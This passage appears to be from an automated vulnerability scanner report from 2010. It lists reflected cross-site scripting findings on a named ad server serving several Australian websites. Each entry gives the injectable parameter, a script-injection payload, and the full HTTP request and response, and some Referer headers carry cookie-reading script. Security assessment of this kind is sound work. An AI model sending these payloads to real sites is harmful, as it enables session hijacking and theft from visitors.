GET /hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782?39391"><script>alert(1)</script>38547484e67=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:51 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 478 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d179"><script>alert(1)</script>56865d7dbc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver7d179"><script>alert(1)</script>56865d7dbc6/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:37 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 507 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58d3"><script>alert(1)</script>ba515e11b58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randoma58d3"><script>alert(1)</script>ba515e11b58=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:38 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 507 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.631. http://media.sensis.com.au/hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f937"><script>alert(1)</script>c6f888998e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?6f937"><script>alert(1)</script>c6f888998e1=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:36 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 510 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d29f9"><script>alert(1)</script>0a444860c0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserverd29f9"><script>alert(1)</script>0a444860c0d/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:35 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed742"><script>alert(1)</script>ee6255739ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomed742"><script>alert(1)</script>ee6255739ef=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:36 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.634. http://media.sensis.com.au/hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd342"><script>alert(1)</script>f60f9df889d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?cd342"><script>alert(1)</script>f60f9df889d=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:34 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 436 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19edf"><script>alert(1)</script>eba141e2a02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver19edf"><script>alert(1)</script>eba141e2a02/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:35 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf3d"><script>alert(1)</script>3d0f9e4267c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random2bf3d"><script>alert(1)</script>3d0f9e4267c=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:36 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.637. http://media.sensis.com.au/hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a29ed"><script>alert(1)</script>5dd6d620969 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?a29ed"><script>alert(1)</script>5dd6d620969=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:34 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 436 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb6d"><script>alert(1)</script>6396bcaf30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver7cb6d"><script>alert(1)</script>6396bcaf30/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:55 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 468 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80699"><script>alert(1)</script>ba4c6074a11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random80699"><script>alert(1)</script>ba4c6074a11=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:56 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 671 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.640. http://media.sensis.com.au/hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 315d5"><script>alert(1)</script>4c5bc8d6a28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=71803890927/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=254201693891?315d5"><script>alert(1)</script>4c5bc8d6a28=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:53 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 480 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79515"><script>alert(1)</script>1b73da98abf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver79515"><script>alert(1)</script>1b73da98abf/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:41 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 503 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af87a"><script>alert(1)</script>0ef098440cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomaf87a"><script>alert(1)</script>0ef098440cd=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:43 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 503 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.643. http://media.sensis.com.au/hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]previousnext
